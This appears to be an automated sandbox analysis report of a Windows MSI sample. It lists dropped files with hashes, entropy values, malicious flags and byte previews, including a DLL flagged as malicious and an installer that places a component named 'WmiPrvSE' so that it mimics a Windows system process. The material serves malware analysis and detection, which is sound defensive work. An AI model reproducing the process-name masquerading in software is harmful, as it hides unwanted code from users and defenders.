Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......':r.c[.Tc[.Tc[.T.).Un[.T.).U.[.T.%.Ur[.T.%.U{[.T.).Uz[.T.%.U=[.T.).Ub[.T.).Ut[.Tc[.T.Z.Tz$.U([.Tz$.Ub[.Tz$.Tb[.Tc[.Tb[.Tz$.Ub[.TRichc[.T................PE..L....=.d.........."!...$.>..........+........P............................................@.........................`..................h............D..@=.......r.....p............................e..@............P..........@....................text....=.......>.................. ..`.rdata...q...P...r...B..............@..@.data...H(..........................@....rsrc...h...........................@..@.reloc...r.......t..................@..B................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI4304.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	2111
Entropy (8bit):	5.76855023326072
Encrypted:	false
SSDEEP:	48:Grl5GOYyBBWKyUYD8S+DyKeqanAyO79khyFC3:GrjYewAeHqKhyFy
MD5:	378EF89297331F646D367D512919AAF1
SHA1:	A1D18BCEC09110C179191997EB4788FAFF179FA8
SHA-256:	021147B47DBFC6C96391761C5CF3E44251683FC2D845ED3ABFAE6875E5B6FDED
SHA-512:	65F18468DA2C806DBA568F852B483F8465A6984690C56E779197A081D83493F3840098E49D3784C11C217B304B8A4961409F425A9D0DF4547F0F267906985CB5
Malicious:	false
Preview:	...@IXOS.@.....@&&.Y.@.....@.....@.....@.....@.....@......&.{88D74BC3-DFDB-412A-9165-9910293F91BC}..WmiPrvSE..1eSOBjseu2.msi.@.....@.....@.....@........&.{9AD54326-34E0-4D44-AFB7-7A7E831CAF55}.....@.....@.....@.....@.......@.....@.....@.......@......WmiPrvSE......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{4CDF882A-AA01-456F-A2EA-94ABE42E2C47}).C:\Program Files (x86)\WmiPrvSE\WmiPrvSE\.@.......@.....@.....@......&.{B4630925-A1BD-4A8D-9FE5-108126E4BB94}&.02:\Software\WmiPrvSE\WmiPrvSE\Version.@.......@.....@.....@......&.{9C0BC1EA-30AD-4B69-AFF6-894FE3DFA0B2}d.02:\Software\Caphyon\Advanced Installer\Prereqs\{88D74BC3-DFDB-412A-9165-9910293F91BC}\1.0.0\Desktop.@.......@.....@.....@........CreateFolders..Creating folders..Folder: [1]".).C:\Program Files (x86)\WmiPrvSE\WmiPrvSE\.@........WriteRegistryValues..Writing system registry values..Key: [1], Name: [2

C:\Windows\Installer\MSI44AA.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	753984
Entropy (8bit):	6.461872633696775
Encrypted:	false
SSDEEP:	12288:sXWV44ngBNmhAzLUhfVdrjpuG1PE0I7+avw4UbY6t5rXf63Rfklet:KWV4zHzLUdVB1n1PE0Yw4Ubz5rXf63hL
MD5:	8DD026145833182777A182A646DF81F3
SHA1:	4F5CB840193EEA97DF088C83A794FB6E8F67AB07
SHA-256:	3071AF6BE43A2611DB45205F0D3F1F25ABA05ACF5F70992FCE2FFFD63EE9C85D
SHA-512:	F6C860BF563A24C046A7D76A6BC1E2F6BBFC80A87AC4513DE331049F35198DCBBDBB5BE7F5D49100E1D1C8AB680ECF3EAAA4FDB8F744C9FD5479A1BA64079391
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......':r.c[.Tc[.Tc[.T.).Un[.T.).U.[.T.%.Ur[.T.%.U{[.T.).Uz[.T.%.U=[.T.).Ub[.T.).Ut[.Tc[.T.Z.Tz$.U([.Tz$.Ub[.Tz$.Tb[.Tc[.Tb[.Tz$.Ub[.TRichc[.T................PE..L....=.d.........."!...$.>..........+........P............................................@.........................`..................h............D..@=.......r.....p............................e..@............P..........@....................text....=.......>.................. ..`.rdata...q...P...r...B..............@..@.data...H(..........................@....rsrc...h...........................@..@.reloc...r.......t..................@..B................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI4577.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	519
Entropy (8bit):	5.246158296818198
Encrypted:	false
SSDEEP:	12:EgyTBdudpNK9JQsj//SftEkV3HKszZxSl:6TBdGpNeJRj7ko6xW
MD5:	FD54866D02FED2512307CA6893DED1C0
SHA1:	A22F2B9116BFEBB03E1A984AC21E727F3BC90181
SHA-256:	BE02563F243A140A1291B011FC7EB5BF7A15C526CBB511A9358CDC3F1D19BCF3
SHA-512:	F2608558C85E369A2CFA7F6989E9773076B4F95FA4D7BCBD6D94FDCF3A652966A1653288D1A9F95E8CD0F55F7548B3CE13853F76AA463957898E0044BEE7E8BF
Malicious:	false
Preview:	...@IXOS.@.....@&&.Y.@.....@.....@.....@.....@.....@......&.{88D74BC3-DFDB-412A-9165-9910293F91BC}..WmiPrvSE..1eSOBjseu2.msi.@.....@.....@.....@........&.{9AD54326-34E0-4D44-AFB7-7A7E831CAF55}.....@.....@.....@.....@.......@.....@.....@.......@......WmiPrvSE......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........AI_LaunchChainer....J...AI_LaunchChainer.@....T.C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe...@.....@.....@....

C:\Windows\Installer\SourceHash{88D74BC3-DFDB-412A-9165-9910293F91BC}

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.164367825876484
Encrypted:	false
SSDEEP:	12:JSbX72Fjm4/iAGiLIlHVRpZh/7777777777777777777777777vDHF3bit/l0i8Q:Jo46QI5t8iF
MD5:	5B5E9E92A577A94C4A256257BE88B4F1
SHA1:	610C2232795A2AE8D7EDD4E8C5297B3CB9DC3A83
SHA-256:	3D789B45B519ECEB4EA32D1BD4909A538DF69AE1BCDFF956546A99468AE4A8E1
SHA-512:	1143487ABCB77DF1F4A47C8FE0F53B1B8025D48F8C19EC93AAF89D7ADDBB1B80DB05284E8E4E62216CB6C98EB0A55A4969C93845E85708E2B101851284886704
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\inprogressinstallinfo.ipi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.5161050850670992
Encrypted:	false
SSDEEP:	48:D8Phj7uRc06WXJWnT5RoH8dZSkdXAEkrCym6EdZSkdDck:qhj71tnTPoeWRC82q
MD5:	1C4423D880CA1C10C18BA64298517241
SHA1:	53F5312D93E15DAB8C6FE617922712E400852D27
SHA-256:	8D97F495FC2F19C707323754F8E33E2815B10EDBA42DEE913883B42BCDCD5E0F
SHA-512:	8CEA158E638C28ECA04FF558C631715DE166407EEA272C2BD0B8257A47AC4180F5772373FF7C064E365A51DA6CC98033126160EDB33DC6E4C1CF81C0CDC924AE
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	360001
Entropy (8bit):	5.36296443091826
Encrypted:	false
SSDEEP:	1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgaul:zTtbmkExhMJCIpEU
MD5:	946EBA3F5104DBE5A4C91D3D1A42E2A2
SHA1:	81779754B4C06FD2ECCDB852DF645FF45D932278
SHA-256:	EB96B869FC405A1581D563A67AB95AC5AE2419E15EC51AAD053B78522F7362C7
SHA-512:	DA7B1B58C142322B6A7C37EEC750816ADC5DA82C7A658133D2F1AAAE42B08625D0A79D580840A8D3BBD8F0FEA198B1159538724D83DDE22467DA7361EF0D6ED2
Malicious:	false
Preview:	.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\49855FCDFA62840A2838AEF1EFAC3C9B

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1236
Entropy (8bit):	7.072668199065973
Encrypted:	false
SSDEEP:	24:+W9AuDaTZSqZkYDbnMmwvPBvMeokvUvr/H2lVZJMC/FN9jcQEYIJ2blcFpmWAUk:+PuDaTZSqZkgJwvPB0eokvUvr/6XJHNn
MD5:	18BCACE5E8162ACA8E2EBEEB1F9EDF29
SHA1:	F277342A4FFB088AAB959D8CC4B9B3455446B5BE
SHA-256:	351D46B240EFEA0A9943D5EE3F67045BB25637AD01E1CF78899E6ACFC19E5229
SHA-512:	A3C7DE8D99BC16077D741D2599AD5719C467E9E5F91ABF62D0E6D7D676F01FFDF14E3B6A0D41ABC0BB05D71FA9E55AC4C91CD13A951155064B497E45922E4CC4
Malicious:	false
Preview:	0...0......0....H........0Z1.0...U....US1.0...U....Microsoft Corporation1+0)..U..."Microsoft ID Verified CS AOC CA 02..240804061727Z..240812063727Z0...0$..3.........81.........240612083143Z02..3.........3........240606103206Z0.0...U.......02..3..i...1.#......i...230216020000Z0.0...U.......02..3..b...L-..B.....b...230118104105Z0.0...U.......02..3........x..........220504165401Z0.0...U.......02..3...?Ml..H.V......?..220331202652Z0.0...U.......02..3.....XS.D.x2........210924182020Z0.0...U.......02..3.....:.]...Z........210715195228Z0.0...U.......02..3......E.RL.........210715195228Z0.0...U........`0^0...U.#..0...$E..w.\|...nd...,g0...+.....7.......0...U.......E0...+.....7......240808062727Z0....H.............P.......F,f..4...+]./t...1..$.?=s.{....e.8..=.X\|....^.W/{y.e.Mt.Wu3.\).......2....p.q..!..%p.c+.p....w...o;.z.c_..%.hs.m...h......`_....,.{T...)E.$8v.r*....s.Z..p..'.=..:Ur=..j..,v...Br..A.c.......\.b.;(%.......p.t:...s[..R.Ag.8o.....t..THc./.X7.f4q,]..\...

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 4770 bytes, 1 file, at 0x2c +A "disallowedcert.stl", number 1, 1 datablock, 0x1 compression
Category:	dropped
Size (bytes):	4770
Entropy (8bit):	7.946747821604857
Encrypted:	false
SSDEEP:	96:9/nBu64pydcvOHRUfu0xK1bQYMRSRNoYmxYvk56sHMZhh4m:9/nBuP2cGxUfu6K1bpWJ6vfh4m
MD5:	1BFE591A4FE3D91B03CDF26EAACD8F89
SHA1:	719C37C320F518AC168C86723724891950911CEA
SHA-256:	9CF94355051BF0F4A45724CA20D1CC02F76371B963AB7D1E38BD8997737B13D8
SHA-512:	02F88DA4B610678C31664609BCFA9D61DB8D0B0617649981AF948F670F41A6207B4EC19FECCE7385A24E0C609CBBF3F2B79A8ACAF09A03C2C432CC4DCE75E9DB
Malicious:	false
Preview:	MSCF............,...................O.................2Wqh .disallowedcert.stl....^K...CK.wTS...:.w.K'.C0T.....Bh.{....C.)......Y@...(..).R."E..D^6........u....\|f~3...o.3. ..SPK.k.o#...."{-.U..P........:..aPr.@.d......Dy.h.....)..:...!./\A.....A<I_<$...q.h..........'.....7....H...@`T..K.S.%...Y4..R.....`.....-....D...(..b..-c."...G.=.dx..S+..2.a.E....d.L...77J...c.[..@..iT&..^78..g....NW6.Ek..FY.F........cNt.O...R..........D...... k........J.y...z.d...;.9_t...].@....yw..}.x....d.t..`f\K..;\|.h.X...4/.;.xT......q>.0...<...3...X..L$.&.,b.....\V....\......G..O..@..H3.....t..J..).x.?.{[..G>.7...<...^Q..z..Gw9P..d....i].n%K}.z..2.Py...A..s...z..@...4..........4.....Y.d..._Z.5.s..fl.C..#.K{9^.E...k..z.Ma..G.(.....5g. ...}.t.#4....$;.,....S@fs....k......u .^2.#_...I........;.......w..P...UCY...$;.S._\|.x..dK...[i..q..^.l..A.?.....'N.. .L.l......m.*.+f#]............A.;.....Z..rIt....RW....Kr1e=8.=.z:Oi.z.d..r..C_......o...]j.N;.s....3@3.dgrv.

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77003E887FC21E505B9E28CBA30E18ED_8ACE642DC0A43382FABA7AE806561A50

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2660
Entropy (8bit):	7.57905194369079
Encrypted:	false
SSDEEP:	48:KitNFpvPI0dLLsh4JuDhJpnurbc29GpTK4pd1mBDRVDVAv5p+Aj5oK09YF00IEp4:D40pYhDhJBurI29gs5pm5IO5oKOgIEp4
MD5:	B0CD0CB4163AD978E7E7DCDF50F21270
SHA1:	5E3A0C4CCE8B92F3A126CF5350C4C0EFF240A38D
SHA-256:	B461B1FF80DB693D6AFF5B0A8ABD45F8591708DB1076AF00081AC577EDAD4B8B
SHA-512:	F938946443142E234B98B0759196B75C1A700E70E42832276CD524A31C31E052A10ACD99D80D982875ACFAD64CF64E0B0972E82CE45C1058B974D32B596CE4AE
Malicious:	false
Preview:	0..`......Y0..U..+.....0.....F0..B0.........e....Iu..n......F..20240801185827Z0v0t0L0...+..............wzb......Z..7...~.j.......'.P.Oh....3......4.{.............20240619182618Z....20240907194820Z0....H.................B.7...aF..K.'.E..{....:.^......QK,}..aW.\...j.wY8/...3.P_"!....!..V!...g.... .:.."...b9Jc...F.jN.q.p.~.K...L"Z@B..`..=...A!~.+....(e.T)...W~...y...<1....>..A~.....L..UlE5+...l..D.&.`......m..l...F..,.7.=p....K.$&...w.o...BX....m.Q.c2...../...6.D.h..8.%..e.......c..$...P.$..#1W.Z@6L.....A..GR.~\i.4v...$o..Pv..Y.w......6..n9h.]...H.1.....U.....R.w.)....R..?a......W.9.?H.v.....(..:.y.x...).t.Z.!/Z.R.....u..M$/..P.4l.1.".J.....>.A.l.N.....kG.T.5m.sB.~2..x...+......2.............0...0..~0..f.......3....f.H.I.UH......0....H........0w1.0...U....US1.0...U....Microsoft Corporation1H0F..U...?Microsoft Identity Verification Root Certificate Authority 20200...240307194820Z..240907194820Z0..1.0...U....US1.0...U....WA1.0...U....Redmond1.0...U....Mi

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7850C7BAFAC9456B4B92328A61976502_9A7DD3DCFFDBC0C2959A4B4B65F6A3E1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1991
Entropy (8bit):	7.519073041703573
Encrypted:	false
SSDEEP:	48:rBauEPuDaTZYLcrB+VcOcWwK1hwAvw1AjVhOLP7Tf9BjD:42DEZYLMBUcnWx1mmw1OVIzPjD
MD5:	CE4E184B2C20FEF2363BE7CAD2482ABA
SHA1:	C4D81EE47FDA2695315AC11A3D4DA5B97FC72308
SHA-256:	AD680EF955921538CD09A8F11CA38D9BD642343E809207819329E66170BD6099
SHA-512:	E1BE5DCAE0926B066ED466C20CDEDD1F9335F5667170B8C23BC8BC9CF694A888C4501E519D84BFA43CDC6E6C4BC3C9574B1133C688BD153C42F80BF6CD2B7071
Malicious:	false
Preview:	0..........0.....+.....0......0...0.....+..g.N.&~,...........20240802112837Z0..0..0L0...+........44N:...!..It.W$..~..$E..w.\|...nd...,g..3.....G..jv:...........20240802101729Z....20240808155018Z. 0.0...+.....7......240806102729Z0....H..............v...B.\.>....::...mc....]..b.W.G...?..57\|.1.>.e....=Z.......$.EGy..8".o.)U.w$..y..]1.....61Z.....o.I.<..mz\....\|.kW..uh..L.......D.m(_.....}.;v...M......fV.'.mE.....e.^XD...:..{...1.S...vy.0....N.d..m.r.&A.p..@...mY.\|[g.H.F.0.........O./v........0...0...0..........3..K...R....H....K.0....H........0Z1.0...U....US1.0...U....Microsoft Corporation1+0)..U..."Microsoft ID Verified CS AOC CA 020...240801155018Z..240808155018Z0.1.0...U....MSIDAOC02 OCSP Cert0.."0....H.............0............6.5....WBi..D.......aYa9. R.....e..........T...V.u........Q..S...?/.] .$e.2R...z.....f_g2....D..Z%...fO.,.r..<K6.,!C...x.V w...V.eXv:@....j.*c_.... ..t'..)&...~\@8x7....~.#..Q.=<X...(.Lg..Q.%....?k,.......@.!0Arke..\|..oo-...N&u:.

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\86844F70250DD8EF225D6B4178798C21_2CDE88B3CC9A35A2EA16DC0201366139

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2607
Entropy (8bit):	7.61013249878447
Encrypted:	false
SSDEEP:	48:f2aGR8wR3KYLs1TY/QkjOtqi7uDjRpnur5OOxeX5nc1H8mVqDn/cAvJAjDKnEKyW:fFGSCKYw18/NJDjRBur5OOUJW8mVYcmx
MD5:	6AB5A494A2C30065D345419DA9C9D81C
SHA1:	F0A95FD688510DBFC62EB3AA1F7D1B9C553E55CE
SHA-256:	83ADBE14A4AB40ACEDEDC3977155393C3F96CCA2937A0CB9D9F9C2F2BC41C8B4
SHA-512:	AC26973C2C0FF93ABDF9C074100FCB8ED66AE6090CC9A9D88566775E4B6BD549435B758F4FBBE8BEAED05C88A786C2BF7A612437143AC96FD8A4C32AEF0591F8
Malicious:	false
Preview:	0..+......$0.. ..+.....0......0...0.........C.....H....R...W..20240803193619Z0v0t0L0...+.........A..HNF;.ZEW..}...@...A)...cl.i...)..Hj0...3.....PK..............20240730201228Z....20240907200105Z0....H...............k3....F.^...t...G.H.x.B...X,.g...\....0../T.......l.@L......ng...mzEFS.}.9........F..m...b.....2f..:5.9.......`B[...v.P.!y..NG.......8..9..A.....>..S...Q.r....S..]..&.{.v..k.M.-........>.....I.c.t-~...,.gL.r6..%...V].g..4R....P.T.8nW....E.F'..?...}(.....p.d..m>.&.$..X.......^r.&....X..$?..{....L.x.~.F.>f..&....}>..M...,.l...T.8....y7..6...[.22.....V..i.....c.$.......F.g.St~Oe#......m....K&f...u"$...}0;..6...V...:..G..%.....Z.44q.F\=+..R9r..R.>P'b..._...U\|.>..(.mL.5Q?1..%.X............Q0..M0..I0..1.......3........V.@.......0....H........0c1.0...U....US1.0...U....Microsoft Corporation1402..U...+Microsoft ID Verified Code Signing PCA 20210...240307200105Z..240907200105Z0..1.0...U....US1.0...U....WA1.0...U....Redmond1.0...U....Microsoft1.0...U....PK

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EF7234CDBB1649702229F955C785C39F

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	785
Entropy (8bit):	7.447636436755226
Encrypted:	false
SSDEEP:	12:oN89GXuBF845RG8CDS0/+U0TaCpezPqsXIUoWAl7+n96VY60ZvJjfTvv:79AuD845RDCDXc6zPqsXJAN+9QWJjLvv
MD5:	3321D4AAFB831E6C80A73E8F0002E60A
SHA1:	8093CD614240A4A242771668C5EF63CA657ABC31
SHA-256:	8D71482B7F06568DF7FABAA824DED89923BB245D82F44E6A0E1AB726B9127A70
SHA-512:	D1B1E221D28C5305219B9814C6D5FE689BE2AB71FB678ECFA15E214F4DADEECEB8A60C6B83099D92DD91841FF8B03D6F0FF6BC698B60974EC28088B2C7477633
Malicious:	false
Preview:	0...0.....0....H........0c1.0...U....US1.0...U....Microsoft Corporation1402..U...+Microsoft ID Verified Code Signing PCA 2021..240730201228Z..241029083228Z._0]0...U.#..0....A)...cl.i...)..Hj0.0...+.....7.......0...U.......0...+.....7......241028202228Z0....H..............'x....m$I.-.UZRs.)b.`d....<.CTe.QL...l.....=..nf#0....}....}}_....!`.s..`.R....,.......&.$L".YbzQ.p,....y..Z..e)!.1.#.IT......%.B...../....x.i8f8..b.a!..}.......%L..l.r.I...7....}Yi...1.....\|q..G..g._.$..;.....S...B........S....c7...<.tG.<.H...!)jcG#....v=.p.:...if....k.h...7..o^.x.i......:c..0W..SLg..\|....M.6C........lW._#2%.5....;.i}..h....]y..\..}.wr..!..O.Z3............\|?@.... ....e^.....r".*..4x......T......5..ae1...,..K...i...4p.I ..G..\|....:.zR.@...R....:n...@Z..G.X...l.l{.0.

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\49855FCDFA62840A2838AEF1EFAC3C9B

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	290
Entropy (8bit):	3.0043737168752243
Encrypted:	false
SSDEEP:	3:kkFkl6qRN/XfllXlE/U3/snXlRDjdClRRly+MlMTlPNylRal1VdlV0lQWKAX4VhF:kKRyN/TspB7WTlpl19ml5o8lAfl1j
MD5:	3F4605A19BB47398356A08A19500AFC4
SHA1:	D4EF416691BAC5DB47E2AD80EF4B735AF52848C5
SHA-256:	D607E2C32E8EDEC356400F4A29B8FDA28B310BF4BE4C0B9E5A473CF3DFA095AF
SHA-512:	0B63D3F1CFDBDB661C35C789D2324805E93941DC81B0FBBC5929E12C2FE78CA27FD69EBEBC579C697137CE007B23D317A847A90EA62EA54A4AE83989F604A23A
Malicious:	false
Preview:	p...... ...........dK...(....................................................... ........1..7.......................h.t.t.p.:././.w.w.w...m.i.c.r.o.s.o.f.t...c.o.m./.p.k.i.o.p.s./.c.r.l./.M.i.c.r.o.s.o.f.t.%.2.0.I.D.%.2.0.V.e.r.i.f.i.e.d.%.2.0.C.S.%.2.0.A.O.C.%.2.0.C.A.%.2.0.0.2...c.r.l...

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	338
Entropy (8bit):	3.2664400712956687
Encrypted:	false
SSDEEP:	6:kKLTglFsN+SkQlPlEGYRMY9z+s3Ql2DUevat:zTITkPlE99SCQl2DUevat
MD5:	A33149C14252A02CD5F8651D9BE74A0D
SHA1:	1B72B8E3330319D311F6C73AFDA9BD09781ED8F1
SHA-256:	AFFE1E8B47CE54F3E4B3E35DBECF8AF6F2367663EBE4D8BA0B9128787B8445D7
SHA-512:	94C0B9559DBC144BFF8CFBBB469B42D99EAC36B185A8D64EEF579CECEB36CF4140C362FB9A28770B21D49280736BAF3A02228FC33FEAA98C0C05093C7CA1AF0B
Malicious:	false
Preview:	p...... ............K...(....................................................... .........p.........$.....(=........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77003E887FC21E505B9E28CBA30E18ED_8ACE642DC0A43382FABA7AE806561A50

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	556
Entropy (8bit):	3.9028380000862817
Encrypted:	false
SSDEEP:	12:/ljUXlqcWuxlX9ysFuuPtuRaoKpRCuzfXAMkM:N+WuxlX9VkuVu4oKRJXjt
MD5:	F95396EC7B07E7111125D0A27A9A8EAB
SHA1:	E90784E238AA4581F0C2D2D57A764885D15A36F5
SHA-256:	607786D9CCE1E789F2EED2CA6BC777409E3CE91935A9AE2389A4011DDAD641DC
SHA-512:	577E0DFE8593EF72A93C5C1406DB0C34F9CC5C517A2F68ABDF15DF8A4E1D749A22F0CF7ADBD013FCA6144337B50B77763A1EB028FEBE4DB6625D796258C8F18E
Malicious:	false
Preview:	p...... ....2....*.AK...(................A"-v.......^.......................^... ................Q..............d...h.t.t.p.:././.o.n.e.o.c.s.p...m.i.c.r.o.s.o.f.t...c.o.m./.o.c.s.p./.M.F.Q.w.U.j.B.Q.M.E.4.w.T.D.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.D.H.s.f.u.q.f.u.b.d.3.p.i.h.v.q.4.m.g.Q.V.W.g.H.W.N.w.Q.U.y.H.7.S.a.o.U.q.G.8.o.Z.m.A.Q.H.J.8.9.Q.E.E.9.o.q.K.I.C.E.z.M.A.A.A.A.H.h.6.M.0.o.3.u.l.j.h.w.A.A.A.A.A.A.A.c.%.3.D...".8.6.8.9.7.e.8.8.4.f.7.0.9.4.5.f.f.2.4.2.8.e.8.9.e.9.e.7.9.c.f.7.9.2.d.9.e.6.3.e.b.8.4.0.a.4.f.3.6.5.5.4.f.d.e.5.a.6.5.9.a.5.d.3."...

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7850C7BAFAC9456B4B92328A61976502_9A7DD3DCFFDBC0C2959A4B4B65F6A3E1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	556
Entropy (8bit):	3.6358766901409694
Encrypted:	false
SSDEEP:	12:QUelScWuxlX9ysFF31c5XC0Jt8Wy+gBBuFBK36t:Q3WuxlX9VP31WC0JKLTBMK30
MD5:	DE8C4105453D7A91D9E7A53C567D889D
SHA1:	E6642411BC871E18EB371234D7916915676DB98E
SHA-256:	C81CD1B5FA74266A1F1D2A1B8B08F2D1F50C89DDDB0A2C4D1F5EE5DE4550FA8D
SHA-512:	9949F4C2050C5449690D77BCB5657688D7B9D9E3E7419EC46452E6A824333A38106A6A11AB9110408A82FA02DD171977EEF7E54B0101C88B0BE98A14752C9AF0
Malicious:	false
Preview:	p...... ....2....8)SK...(....................................................... ................Q..................h.t.t.p.:././.o.n.e.o.c.s.p...m.i.c.r.o.s.o.f.t...c.o.m./.o.c.s.p./.M.F.Q.w.U.j.B.Q.M.E.4.w.T.D.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.Q.0.N.E.4.6.k.r.j.t.I.f.f.E.j.0.l.0.0.l.c.k.K.s.L.u.f.g.Q.U.J.E.W.Z.o.X.e.Q.K.n.z.D.y.o.O.w.b.m.Q.W.h.C.r.4.L.G.c.C.E.z.M.A.A.J.U.c.t.0.c.L.3.m.p.2.O.v.k.A.A.A.A.A.l.R.w.%.3.D...".8.b.9.8.e.8.0.c.0.a.6.a.b.f.d.8.0.0.d.5.3.f.e.d.9.f.4.6.d.1.2.4.9.c.f.3.a.d.0.8.f.c.7.6.1.d.6.c.4.5.c.c.2.1.6.0.0.6.4.a.c.7.6.6."...

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\86844F70250DD8EF225D6B4178798C21_2CDE88B3CC9A35A2EA16DC0201366139

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	560
Entropy (8bit):	3.5947218382925348
Encrypted:	false
SSDEEP:	12:JyQvtllcWuxlX9ysFPH+ee+lHRoW+i4tivT2Cf1dmwhp:J7v+WuxlX9Va+lHd0ti6Cf1zp
MD5:	246FD46B3490400AFA5C5618E1BAF909
SHA1:	97C26C1781A45C4217E12FE7B3059DCB77F1C3CB
SHA-256:	3D28A5ECD8F1835CA662B5289D1FAD94692D77E10BC1454579E463A9016BC062
SHA-512:	351D86FAD6495E8B39919EA4C3CD2E2FC00EA1F7E18FF0832063EB752D51475771FE7BA7020D8E1D6245AFDC6EFB750E9BA77D5539E5631FD786960B487F53A0
Malicious:	false
